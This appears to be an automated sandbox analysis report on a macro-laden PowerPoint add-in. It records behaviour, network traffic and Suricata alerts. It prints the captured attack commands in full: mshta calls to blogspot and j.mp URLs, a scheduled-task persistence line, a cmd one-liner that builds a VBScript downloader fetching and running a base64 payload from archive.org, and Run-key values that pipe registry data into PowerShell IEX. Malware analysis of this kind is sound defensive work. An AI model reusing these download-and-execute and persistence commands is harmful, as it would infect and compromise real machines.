Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 30, 2021, 9:43 a.m.	April 30, 2021, 9:45 a.m.

Size	11.9KB
Type	Microsoft PowerPoint 2007+
MD5	`c8e1760af8a65590d26315a4ff144b62`
SHA256	`dffd29f5fcbcb7ee1f0a4d31e3cf616b6a525275b49d9d47d625f811f48cfc08`
CRC32	`DC3F931A`
ssdeep	`192:ZILz+pGqEls2oGnmaPuXDgrUIWBf+t1+MbJcsRgV7QyD0OoAisP3A3:mGpGqcsXGnFPSxI++T+Mbip/hu`
Yara	Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]

POWERPNT.EXE "C:\Program Files (x86)\Microsoft Office\Office12\POWERPNT.EXE" /S "C:\Users\test22\AppData\Local\Temp\Company Details.ppam"
996
- mshta.exe mshta http://www.j.mp/ddsobpechateessentesathatesesjdw
  3532
  - schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\")
    8104

Name	Response	Post-Analysis Lookup
bit.ly	A 67.199.248.11 A 67.199.248.10	67.199.248.10
accounts.google.com	A 142.250.66.109	216.58.220.141
www.j.mp	A 67.199.248.17 CNAME j.mp A 67.199.248.16	67.199.248.17
ia601409.us.archive.org	A 207.241.227.129	207.241.227.129
yahameinhunbusorkoinai.blogspot.com	CNAME blogspot.l.googleusercontent.com A 142.250.199.65	172.217.175.65
google.com	A 142.250.204.110	216.58.220.142
www.blogger.com	A 172.217.26.137 CNAME blogger.l.google.com	172.217.175.9
resources.blogblog.com	CNAME blogger.l.google.com A 142.250.66.41	172.217.31.137

IP Address	Status	Action
142.250.199.65	Active	Moloch
142.250.204.110	Active	Moloch
142.250.66.109	Active	Moloch
142.250.66.41	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
172.217.26.137	Active	Moloch
207.241.227.129	Active	Moloch
67.199.248.10	Active	Moloch
67.199.248.17	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49812 -> 172.217.26.137:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49817 -> 142.250.66.109:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49819 -> 207.241.227.129:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49810 -> 142.250.199.65:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49814 -> 142.250.66.41:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49815 -> 142.250.66.41:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49813 -> 172.217.26.137:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49812 172.217.26.137:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com	6d:15:a5:86:b1:43:d2:08:12:2b:dd:b8:2b:a2:75:1c:17:14:4f:37
TLSv1 192.168.56.102:49810 142.250.199.65:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=misc-sni.blogspot.com	9c:32:17:b5:e8:f9:04:a7:4d:a7:f0:b9:db:ca:b3:18:75:b5:cb:50
TLSv1 192.168.56.102:49819 207.241.227.129:443	C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http://certs.godaddy.com/repository/, CN=Go Daddy Secure Certificate Authority - G2	OU=Domain Control Validated, CN=*.us.archive.org	9c:3c:d6:6d:65:69:f2:95:8c:99:48:e3:e0:7f:14:38:36:4c:ba:d0
TLSv1 192.168.56.102:49814 142.250.66.41:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com	6d:15:a5:86:b1:43:d2:08:12:2b:dd:b8:2b:a2:75:1c:17:14:4f:37
TLSv1 192.168.56.102:49815 142.250.66.41:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com	6d:15:a5:86:b1:43:d2:08:12:2b:dd:b8:2b:a2:75:1c:17:14:4f:37
TLSv1 192.168.56.102:49813 172.217.26.137:443	None	None	None

Queries for the computername (3 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 30, 2021, 9:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 30, 2021, 9:43 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 30, 2021, 9:43 a.m.	computer_name: TEST22-PC	1	1

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW April 30, 2021, 9:43 a.m.	buffer: SUCCESS: The scheduled task "WIND0WSUPLATE" has successfully been created. console_handle: 0x00000007	1	1	0

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 30, 2021, 9:43 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET https://ia601409.us.archive.org/1/items/divonee111/divonee111.txt

Performs some HTTP requests (15 events)

request	GET http://www.j.mp/ddsobpechateessentesathatesesjdw
request	GET http://bit.ly/ddsobpechateessentesathatesesjdw
request	GET https://yahameinhunbusorkoinai.blogspot.com/p/divine11111.html
request	GET https://www.blogger.com/static/v1/widgets/115981500-css_bundle_v2.css
request	GET https://www.blogger.com/static/v1/jsbin/1277698886-ieretrofit.js
request	GET https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js
request	GET https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9202096335134795169&zx=b73d5666-d098-4854-a4dd-8e948356adfd
request	GET https://www.blogger.com/static/v1/widgets/1564291244-widgets.js
request	GET https://resources.blogblog.com/img/icon18_edit_allbkg.gif
request	GET https://resources.blogblog.com/img/icon18_wrench_allbkg.png
request	GET https://www.blogger.com/blogin.g?blogspotURL=https://yahameinhunbusorkoinai.blogspot.com/p/divine11111.html&type=blog
request	GET https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png
request	GET https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png
request	GET https://www.blogger.com/img/share_buttons_20_3.png
request	GET https://ia601409.us.archive.org/1/items/divonee111/divonee111.txt

Allocates read-write-execute memory (usually to unpack itself) (50 out of 160 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 996 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73711000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 996 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05661000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 996 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 996 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 996 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x046f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 996 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04630000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04630000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04630000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04631000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04631000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04631000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04631000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04631000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04631000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04632000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04632000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04632000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04632000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04633000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04633000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04634000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04635000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04636000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04637000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04638000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04639000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04639000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0463a000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0463a000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0463b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0463b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0463b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0463b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0463b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0463b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0463b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0463c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0463c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0463c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0463c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0463d000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0463e000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0463e000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0463f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0463f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0463f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0463f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a10000 process_handle: 0xffffffff	1

Creates executable files on the filesystem (3 events)

file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\1277698886-ieretrofit[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\3858658042-comment_from_post_iframe[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\1564291244-widgets[1].js

Creates a suspicious process (3 events)

cmdline	mshta http://www.j.mp/ddsobpechateessentesathatesesjdw
cmdline	"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\")
cmdline	schtasks /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\")

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW April 30, 2021, 9:43 a.m.	show_type: 0 filepath_r: schtasks parameters: /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\") filepath: schtasks	1	1	0
ShellExecuteExW April 30, 2021, 9:43 a.m.	show_type: 0 filepath_r: cMd parameters: /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs filepath: cMd	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 30, 2021, 9:43 a.m.	process_identifier: 3532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x04630000 process_handle: 0xffffffff	1	0	0

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\")
cmdline	cMd /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs
cmdline	schtasks /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divine111.html""\"", 0 : window.close"\")

Communicates with host for which no DNS query was performed (1 event)

host

172.217.25.14

Installs itself for autorun at Windows startup (6 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\DLESOLCRETSAM	reg_value	mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).MSOFFICELO)\|IEX"", 0 : window.close")
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography	reg_value	"mshta""http://1230948%1230948@backbones1234511a.blogspot.com/p/newdivineback2.html"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\(Default)	reg_value	"mshta""http://1230948%1230948@startthepartyup.blogspot.com/p/backbone15.html"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo	reg_value	"mshta""http://1230948%1230948@ghostbackbone123.blogspot.com/p/ghostbackup14.html"
